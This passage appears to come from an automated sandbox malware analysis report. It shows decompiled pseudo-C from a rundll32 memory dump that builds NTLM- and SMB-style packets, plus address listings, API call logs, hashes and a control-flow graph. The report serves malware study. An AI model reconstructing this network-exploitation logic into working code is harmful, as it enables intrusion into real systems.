                                                                                                                                                                                        							 *((intOrPtr*)(_t264 + 0x4b)) = 0x505353;
                                                                                                                                                                                        							 *((intOrPtr*)(_t264 + 0x4f)) = 3;
                                                                                                                                                                                        							if(0 == _t325) {
                                                                                                                                                                                        								_t288 = 0x48;
                                                                                                                                                                                        								_push(0x40);
                                                                                                                                                                                        								 *((intOrPtr*)(_t264 + 0x67)) = 0;
                                                                                                                                                                                        								 *((intOrPtr*)(_t264 + 0x6f)) = 0;
                                                                                                                                                                                        								 *((intOrPtr*)(_t264 + 0x77)) = 0;
                                                                                                                                                                                        								_t250 = 8;
                                                                                                                                                                                        								 *((intOrPtr*)(_t264 + 0x57)) = _t288;
                                                                                                                                                                                        								 *((intOrPtr*)(_t264 + 0x5f)) = _t288;
                                                                                                                                                                                        								 *((intOrPtr*)(_t264 + 0x7f)) = _t288;
                                                                                                                                                                                        								 *((short*)(_t264 + 0x73)) = _t250;
                                                                                                                                                                                        								 *((short*)(_t264 + 0x75)) = _t250;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								_t258 = 0x18;
                                                                                                                                                                                        								 *((short*)(_t264 + 0x53)) = _t258;
                                                                                                                                                                                        								 *((short*)(_t264 + 0x55)) = _t258;
                                                                                                                                                                                        								_t302 = 0x68;
                                                                                                                                                                                        								 *((intOrPtr*)(_t264 + 0x57)) = (_t325 & 0x0000ffff) + (_t325 & 0x0000ffff) + 0x40;
                                                                                                                                                                                        								_t261 = 0x40;
                                                                                                                                                                                        								_t292 = _t325 + _t325;
                                                                                                                                                                                        								 *((intOrPtr*)(_t264 + 0x5f)) = _t302;
                                                                                                                                                                                        								 *((intOrPtr*)(_t264 + 0x67)) = _t261;
                                                                                                                                                                                        								 *((short*)(_t264 + 0x6b)) = _t292;
                                                                                                                                                                                        								 *((short*)(_t264 + 0x6d)) = _t292;
                                                                                                                                                                                        								 *((intOrPtr*)(_t264 + 0x6f)) = _t261;
                                                                                                                                                                                        								 *((intOrPtr*)(_t264 + 0x77)) = 0x50;
                                                                                                                                                                                        								 *((intOrPtr*)(_t264 + 0x7f)) = _t302;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t142 = _t264 + 0x87; // 0x87
                                                                                                                                                                                        							_t315 = _t142;
                                                                                                                                                                                        							 *((intOrPtr*)(_t264 + 0x83)) = 0xa0880205;
                                                                                                                                                                                        							memcpy(_t315, _a16, _v16);
                                                                                                                                                                                        							_t331 = _t330 + 0xc;
                                                                                                                                                                                        							if(0 != _t325) {
                                                                                                                                                                                        								_t289 = 6;
                                                                                                                                                                                        								_t253 = memcpy(_t315 + _v16, _v20, _t289 << 2);
                                                                                                                                                                                        								_t331 = _t331 + 0xc;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								_t257 = _v20;
                                                                                                                                                                                        								 *_t315 =  *_t257;
                                                                                                                                                                                        								_t253 =  *(_t257 + 4);
                                                                                                                                                                                        								 *(_t315 + 4) = _t253;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							__imp__#19(_a4, _t264, _a12, 0); // executed
                                                                                                                                                                                        							if(_t253 > 0) {
                                                                                                                                                                                        								_t319 = _a24;
                                                                                                                                                                                        								__imp__#16(_a4, _t319, 0xffff, 0); // executed
                                                                                                                                                                                        								if(_t253 > 0) {
                                                                                                                                                                                        									if( *((intOrPtr*)(_t319 + 9)) == 0) {
                                                                                                                                                                                        										_v5 = 1;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									memset(_t319, 0, 0xffff);
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							HeapFree(GetProcessHeap(), 8, _t264);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _v20);
                                                                                                                                                                                        						_t322 = _v28;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v48);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				HeapFree(GetProcessHeap(), 8, _v32);
                                                                                                                                                                                        				goto L49;
                                                                                                                                                                                        			}
                                                                                                                                                                                        0x007b1819
                                                                                                                                                                                        0x007b181a
                                                                                                                                                                                        0x007b1823
                                                                                                                                                                                        0x007b1824
                                                                                                                                                                                        0x007b182a
                                                                                                                                                                                        0x007b1830
                                                                                                                                                                                        0x007b1831
                                                                                                                                                                                        0x007b1835
                                                                                                                                                                                        0x007b1839
                                                                                                                                                                                        0x007b183f
                                                                                                                                                                                        0x007b1846
                                                                                                                                                                                        0x007b184b
                                                                                                                                                                                        0x007b184e
                                                                                                                                                                                        0x007b1850
                                                                                                                                                                                        0x007b1852
                                                                                                                                                                                        0x007b1853
                                                                                                                                                                                        0x007b1855
                                                                                                                                                                                        0x007b1856
                                                                                                                                                                                        0x007b1856
                                                                                                                                                                                        0x007b1863
                                                                                                                                                                                        0x007b186b
                                                                                                                                                                                        0x007b1c16
                                                                                                                                                                                        0x007b1c1c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b1c1c
                                                                                                                                                                                        0x007b1871
                                                                                                                                                                                        0x007b187f
                                                                                                                                                                                        0x007b188a
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b189c
                                                                                                                                                                                        0x007b18a5
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b18ad
                                                                                                                                                                                        0x007b18ae
                                                                                                                                                                                        0x007b18b5
                                                                                                                                                                                        0x007b18c1
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b18ce
                                                                                                                                                                                        0x007b18d2
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b18d4
                                                                                                                                                                                        0x007b18dd
                                                                                                                                                                                        0x007b18e8
                                                                                                                                                                                        0x007b18f2
                                                                                                                                                                                        0x007b18fd
                                                                                                                                                                                        0x007b18ff
                                                                                                                                                                                        0x007b1904
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b191f
                                                                                                                                                                                        0x007b1926
                                                                                                                                                                                        0x007b1c08
                                                                                                                                                                                        0x007b1c10
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b1c10
                                                                                                                                                                                        0x007b192c
                                                                                                                                                                                        0x007b1941
                                                                                                                                                                                        0x007b1948
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b1955
                                                                                                                                                                                        0x007b195b
                                                                                                                                                                                        0x007b195d
                                                                                                                                                                                        0x007b1962
                                                                                                                                                                                        0x007b1bfa
                                                                                                                                                                                        0x007b1c02
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b1c02
                                                                                                                                                                                        0x007b196b
                                                                                                                                                                                        0x007b1970
                                                                                                                                                                                        0x007b1973
                                                                                                                                                                                        0x007b1976
                                                                                                                                                                                        0x007b1979
                                                                                                                                                                                        0x007b197c
                                                                                                                                                                                        0x007b1983
                                                                                                                                                                                        0x007b1983
                                                                                                                                                                                        0x007b198c
                                                                                                                                                                                        0x007b198f
                                                                                                                                                                                        0x007b198f
                                                                                                                                                                                        0x007b1992
                                                                                                                                                                                        0x007b1992
                                                                                                                                                                                        0x007b19a7
                                                                                                                                                                                        0x007b19ae
                                                                                                                                                                                        0x007b19bb
                                                                                                                                                                                        0x007b19bd
                                                                                                                                                                                        0x007b19c2
                                                                                                                                                                                        0x007b19cb
                                                                                                                                                                                        0x007b19d0
                                                                                                                                                                                        0x007b19d1
                                                                                                                                                                                        0x007b19d2
                                                                                                                                                                                        0x007b19d3
                                                                                                                                                                                        0x007b19d6
                                                                                                                                                                                        0x007b19dc
                                                                                                                                                                                        0x007b19e5
                                                                                                                                                                                        0x007b19e7
                                                                                                                                                                                        0x007b19ed
                                                                                                                                                                                        0x007b19ed
                                                                                                                                                                                        0x007b19ff
                                                                                                                                                                                        0x007b1a08
                                                                                                                                                                                        0x007b1a0a
                                                                                                                                                                                        0x007b1a0a
                                                                                                                                                                                        0x007b1a1c
                                                                                                                                                                                        0x007b1a20
                                                                                                                                                                                        0x007b1a30
                                                                                                                                                                                        0x007b1a37
                                                                                                                                                                                        0x007b1a37
                                                                                                                                                                                        0x007b1a39
                                                                                                                                                                                        0x007b1a3f
                                                                                                                                                                                        0x007b1a42
                                                                                                                                                                                        0x007b1a4b
                                                                                                                                                                                        0x007b1a51
                                                                                                                                                                                        0x007b1a52
                                                                                                                                                                                        0x007b1a59
                                                                                                                                                                                        0x007b1a5f
                                                                                                                                                                                        0x007b1a63
                                                                                                                                                                                        0x007b1a67
                                                                                                                                                                                        0x007b1a6d
                                                                                                                                                                                        0x007b1a74
                                                                                                                                                                                        0x007b1a79
                                                                                                                                                                                        0x007b1a79
                                                                                                                                                                                        0x007b1a85
                                                                                                                                                                                        0x007b1a8c
                                                                                                                                                                                        0x007b1a8e
                                                                                                                                                                                        0x007b1a91
                                                                                                                                                                                        0x007b1a93
                                                                                                                                                                                        0x007b1a96
                                                                                                                                                                                        0x007b1a98
                                                                                                                                                                                        0x007b1a9d
                                                                                                                                                                                        0x007b1aa2
                                                                                                                                                                                        0x007b1aa9
                                                                                                                                                                                        0x007b1aad
                                                                                                                                                                                        0x007b1ab1
                                                                                                                                                                                        0x007b1ab5
                                                                                                                                                                                        0x007b1ab9
                                                                                                                                                                                        0x007b1ac0
                                                                                                                                                                                        0x007b1ac7
                                                                                                                                                                                        0x007b1ad1
                                                                                                                                                                                        0x007b1b10

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,007B1C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 007B1783
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B178C
                                                                                                                                                                                        • CharUpperW.USER32(00000000), ref: 007B17B2
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000086), ref: 007B17DA
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B17DD
                                                                                                                                                                                        • htons.WS2_32(00000082), ref: 007B1801
                                                                                                                                                                                        • send.WS2_32(00000086,?,00000086,00000041), ref: 007B1863
                                                                                                                                                                                        • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 007B187F
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000018), ref: 007B18F4
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B18FD
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000,?,00008003,00008003,?,?,00000000,?,00008002), ref: 007B1958
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B195B
                                                                                                                                                                                        • rand.MSVCRT ref: 007B1983
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000018,?,00000010,?,?,00008003), ref: 007B19B8
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B19BB
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B1A13
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B1A16
                                                                                                                                                                                        • htons.WS2_32(-000000FC), ref: 007B1A39
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B1B48
                                                                                                                                                                                        • send.WS2_32(?,00000000,00000000,00000000), ref: 007B1B7A
                                                                                                                                                                                        • recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B1B93
                                                                                                                                                                                        • memset.MSVCRT ref: 007B1BAB
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B1BB6
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B1BBD
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B1BC8
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B1BCF
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B1BE3
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B1BE6
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000010,?,?,00008003), ref: 007B1BF1
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B1BF4
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B1BFF
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B1C02
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,00008002), ref: 007B1C0D
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B1C10
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B1C19
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B1C1C
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B1C27
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B1C2A
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$Free$Alloc$htonsrecvsend$CharUppermemcpymemsetrand
                                                                                                                                                                                        • String ID: Oet Uet0Xet$NTLM$SSP
                                                                                                                                                                                        • API String ID: 2370844593-2728736143
                                                                                                                                                                                        • Opcode ID: 0603cf4c1b7d28d75da527e0ea062199e26cb93bb1b9f8f6859c29c4d6258535
                                                                                                                                                                                        • Instruction ID: a638d5c4fce011fc7e4ffbb12bcad51f30b872014e3ad10a8af17ed1debd75ae
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0603cf4c1b7d28d75da527e0ea062199e26cb93bb1b9f8f6859c29c4d6258535
                                                                                                                                                                                        • Instruction Fuzzy Hash: 81F1AE75900346EFDF24DFA8C895BAA7BB4FF48300F408469E944DB292EB79D805CB59
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 113 7b2497-7b24bf GetProcessHeap HeapAlloc 114 7b26ff-7b2705 113->114 115 7b24c5-7b24d6 GetProcessHeap HeapAlloc 113->115 116 7b26ec-7b26fe 115->116 117 7b24dc-7b255d rand htons 115->117 116->114 118 7b256f-7b258a HeapAlloc 117->118 119 7b255f-7b256d rand 117->119 122 7b26dc-7b26e5 118->122 123 7b2590-7b25cb htons 118->123 119->118 119->119 122->116 125 7b25cd-7b25db rand 123->125 125->125 126 7b25dd-7b25f8 RtlAllocateHeap 125->126 129 7b25fe-7b2634 memcpy * 2 send 126->129 130 7b26cc-7b26d5 126->130 131 7b26ba-7b26c5 129->131 132 7b263a-7b2651 send 129->132 130->122 131->130 132->131 133 7b2653-7b2667 132->133 136 7b2694-7b269b recv 133->136 137 7b2669-7b2677 136->137 138 7b269d 136->138 137->131 139 7b2679-7b2680 137->139 138->131 139->131 140 7b2682-7b2688 139->140 141 7b268a-7b2693 140->141 142 7b269f-7b26a3 140->142 141->136 143 7b26b6 142->143 144 7b26a5-7b26b4 call 7b2344 142->144 143->131 144->131
                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                        			E007B2497(void* __ecx, intOrPtr _a4, void** _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                        				short _t75;
                                                                                                                                                                                        				void* _t84;
                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                        				void* _t101;
                                                                                                                                                                                        				void* _t105;
                                                                                                                                                                                        				signed int _t108;
                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                        				intOrPtr _t111;
                                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                                        				signed int _t115;
                                                                                                                                                                                        				void* _t120;
                                                                                                                                                                                        				void** _t124;
                                                                                                                                                                                        				void* _t128;
                                                                                                                                                                                        				void* _t131;
                                                                                                                                                                                        				void* _t137;
                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                        				void* _t140;
                                                                                                                                                                                        				intOrPtr* _t141;
                                                                                                                                                                                        				intOrPtr* _t142;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t65 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                                                        				_v12 = _t65;
                                                                                                                                                                                        				if(_t65 == 0) {
                                                                                                                                                                                        					L24:
                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t105 = HeapAlloc(GetProcessHeap(), 8, 0x1124);
                                                                                                                                                                                        				if(_t105 == 0) {
                                                                                                                                                                                        					L23:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                                                        					goto L24;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t124 = _a8;
                                                                                                                                                                                        				_t71 = rand();
                                                                                                                                                                                        				_t108 = 0x14;
                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                        				_t109 = 9;
                                                                                                                                                                                        				 *((intOrPtr*)( *_t124 + 0x22)) =  *((intOrPtr*)( *_t124 + 0x22)) + _t71 % _t108;
                                                                                                                                                                                        				_t73 = memcpy(_t105,  *_t124, _t109 << 2);
                                                                                                                                                                                        				__imp__#9(0x1120);
                                                                                                                                                                                        				 *(_t105 + 2) = _t73;
                                                                                                                                                                                        				_t111 = 4;
                                                                                                                                                                                        				 *((intOrPtr*)(_t105 + 0x40)) = 0x10d0;
                                                                                                                                                                                        				 *((intOrPtr*)(_t105 + 0x2c)) = 0x10d0;
                                                                                                                                                                                        				 *((intOrPtr*)(_t105 + 0x34)) = 0x10d0;
                                                                                                                                                                                        				_t75 = 5;
                                                                                                                                                                                        				 *((short*)(_t105 + 0x49)) = _t75;
                                                                                                                                                                                        				 *((short*)(_t105 + 0x4b)) =  *((intOrPtr*)(_t105 + 0x40)) + 7;
                                                                                                                                                                                        				 *((char*)(_t105 + 8)) = 0xa0;
                                                                                                                                                                                        				 *((char*)(_t105 + 0x24)) = 0x13;
                                                                                                                                                                                        				 *((intOrPtr*)(_t105 + 0x28)) = 0;
                                                                                                                                                                                        				 *((intOrPtr*)(_t105 + 0x30)) = 0x3f3c;
                                                                                                                                                                                        				 *((intOrPtr*)(_t105 + 0x38)) = _t111;
                                                                                                                                                                                        				 *((intOrPtr*)(_t105 + 0x3c)) = 0x4c;
                                                                                                                                                                                        				 *((intOrPtr*)(_t105 + 0x44)) = 0x50;
                                                                                                                                                                                        				_t137 = 0;
                                                                                                                                                                                        				 *((short*)(_t105 + 0x50)) = _a12;
                                                                                                                                                                                        				if( *((intOrPtr*)(_t105 + 0x40)) <= 0) {
                                                                                                                                                                                        					L4:
                                                                                                                                                                                        					_t128 = HeapAlloc(GetProcessHeap(), 8, 0x160);
                                                                                                                                                                                        					_a12 = _t128;
                                                                                                                                                                                        					if(_t128 == 0) {
                                                                                                                                                                                        						L22:
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _t105);
                                                                                                                                                                                        						goto L23;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t112 = 9;
                                                                                                                                                                                        					_t84 = memcpy(_t128,  *_a8, _t112 << 2);
                                                                                                                                                                                        					__imp__#9(0x15c);
                                                                                                                                                                                        					_t131 = _a12;
                                                                                                                                                                                        					 *(_t131 + 2) = _t84;
                                                                                                                                                                                        					 *((intOrPtr*)(_t131 + 0x2c)) = 0x114;
                                                                                                                                                                                        					 *((intOrPtr*)(_t131 + 0x3c)) = 0x114;
                                                                                                                                                                                        					 *((char*)(_t131 + 8)) = 0xa1;
                                                                                                                                                                                        					 *((char*)(_t131 + 0x24)) = 0x12;
                                                                                                                                                                                        					 *((intOrPtr*)(_t131 + 0x40)) = 0x48;
                                                                                                                                                                                        					 *((short*)(_t131 + 0x49)) = 0x115;
                                                                                                                                                                                        					_t139 = 0;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						 *((char*)(_t131 + _t139 + 0x4c)) = rand();
                                                                                                                                                                                        						_t139 = _t139 + 1;
                                                                                                                                                                                        					} while (_t139 <  *((intOrPtr*)(_t131 + 0x3c)));
                                                                                                                                                                                        					_t89 = RtlAllocateHeap(GetProcessHeap(), 8, 0x1284); // executed
                                                                                                                                                                                        					_t140 = _t89;
                                                                                                                                                                                        					_a8 = _t140;
                                                                                                                                                                                        					if(_t140 == 0) {
                                                                                                                                                                                        						L21:
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _t131);
                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					memcpy(_t140, _t105, 0x1124);
                                                                                                                                                                                        					_t46 = _t140 + 0x1124; // 0x1124
                                                                                                                                                                                        					memcpy(_t46, _t131, 0x160);
                                                                                                                                                                                        					_t141 = __imp__#19; // executed
                                                                                                                                                                                        					_t95 =  *_t141(_a4, _t140, 0x111c, 0); // executed
                                                                                                                                                                                        					if(_t95 <= 0) {
                                                                                                                                                                                        						L20:
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _a8);
                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t100 =  *_t141(_a4, _a8 + 0x111c, 0x168, 0); // executed
                                                                                                                                                                                        					if(_t100 <= 0) {
                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_a12 = _a12 & 0x00000000;
                                                                                                                                                                                        					_t142 = __imp__#16;
                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                        					_push(0xffff);
                                                                                                                                                                                        					_push(_v12);
                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                        						_t101 =  *_t142(_a4); // executed
                                                                                                                                                                                        						if(_t101 <= 0) {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t115 = _a12 + _t101;
                                                                                                                                                                                        						_a12 = _t115;
                                                                                                                                                                                        						if(_t115 == 0x1193) {
                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t120 = _v12;
                                                                                                                                                                                        						if( *((intOrPtr*)(_t120 + 9)) != 0) {
                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(_t115 >= 0x1280) {
                                                                                                                                                                                        							if(_t101 < 0x1c) {
                                                                                                                                                                                        								_v5 = 0;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								_v5 = E007B2344(_t101, _t115 - _t101 + _t120, _a16);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                        						_push(0xffff);
                                                                                                                                                                                        						_push(_t120 + _t115);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					L3:
                                                                                                                                                                                        					 *((char*)(_t105 + _t137 + 0x54)) = rand();
                                                                                                                                                                                        					_t137 = _t137 + 1;
                                                                                                                                                                                        				} while (_t137 <  *((intOrPtr*)(_t105 + 0x40)));
                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                        			}






























                                                                                                                                                                                        0x007b2556
                                                                                                                                                                                        0x007b255d
                                                                                                                                                                                        0x007b256f
                                                                                                                                                                                        0x007b2583
                                                                                                                                                                                        0x007b2585
                                                                                                                                                                                        0x007b258a
                                                                                                                                                                                        0x007b26dc
                                                                                                                                                                                        0x007b26e6
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b26e6
                                                                                                                                                                                        0x007b2597
                                                                                                                                                                                        0x007b259d
                                                                                                                                                                                        0x007b259f
                                                                                                                                                                                        0x007b25a5
                                                                                                                                                                                        0x007b25a8
                                                                                                                                                                                        0x007b25b1
                                                                                                                                                                                        0x007b25b4
                                                                                                                                                                                        0x007b25b8
                                                                                                                                                                                        0x007b25bc
                                                                                                                                                                                        0x007b25c0
                                                                                                                                                                                        0x007b25c7
                                                                                                                                                                                        0x007b25cb
                                                                                                                                                                                        0x007b25cd
                                                                                                                                                                                        0x007b25d3
                                                                                                                                                                                        0x007b25d7
                                                                                                                                                                                        0x007b25d8
                                                                                                                                                                                        0x007b25eb
                                                                                                                                                                                        0x007b25f1
                                                                                                                                                                                        0x007b25f3
                                                                                                                                                                                        0x007b25f8
                                                                                                                                                                                        0x007b26cc
                                                                                                                                                                                        0x007b26d6
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b26d6
                                                                                                                                                                                        0x007b2605
                                                                                                                                                                                        0x007b260f
                                                                                                                                                                                        0x007b2617
                                                                                                                                                                                        0x007b262a
                                                                                                                                                                                        0x007b2630
                                                                                                                                                                                        0x007b2634
                                                                                                                                                                                        0x007b26ba
                                                                                                                                                                                        0x007b26c6
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b26c6
                                                                                                                                                                                        0x007b264d
                                                                                                                                                                                        0x007b2651
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b2653
                                                                                                                                                                                        0x007b2657
                                                                                                                                                                                        0x007b265d
                                                                                                                                                                                        0x007b265f
                                                                                                                                                                                        0x007b2664
                                                                                                                                                                                        0x007b2694
                                                                                                                                                                                        0x007b2697
                                                                                                                                                                                        0x007b269b
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b266c
                                                                                                                                                                                        0x007b266e
                                                                                                                                                                                        0x007b2677
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b2679
                                                                                                                                                                                        0x007b2680
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b2688
                                                                                                                                                                                        0x007b26a3
                                                                                                                                                                                        0x007b26b6
                                                                                                                                                                                        0x007b26a5
                                                                                                                                                                                        0x007b26b1
                                                                                                                                                                                        0x007b26b1
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b26a3
                                                                                                                                                                                        0x007b268a
                                                                                                                                                                                        0x007b268c
                                                                                                                                                                                        0x007b2693
                                                                                                                                                                                        0x007b2693
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b255f
                                                                                                                                                                                        0x007b255f
                                                                                                                                                                                        0x007b2565
                                                                                                                                                                                        0x007b2569
                                                                                                                                                                                        0x007b256a
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B24AF
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B24B8
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001124,74654F20,?,?,?,007B471C,?,?,?,?,?), ref: 007B24CD
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B24D0
                                                                                                                                                                                        • rand.MSVCRT ref: 007B24E1
                                                                                                                                                                                        • htons.WS2_32(00001120), ref: 007B24FF
                                                                                                                                                                                        • rand.MSVCRT ref: 007B255F
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,007B471C,?,?,?,?,?), ref: 007B2576
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B257D
                                                                                                                                                                                        • htons.WS2_32(0000015C), ref: 007B259F
                                                                                                                                                                                        • rand.MSVCRT ref: 007B25CD
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001284,?,?,?,007B471C,?,?,?,?,?), ref: 007B25E4
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B25EB
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B2605
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B2617
                                                                                                                                                                                        • send.WS2_32(?,00000000,0000111C,00000000), ref: 007B2630
                                                                                                                                                                                        • send.WS2_32(?,?,00000168,00000000), ref: 007B264D
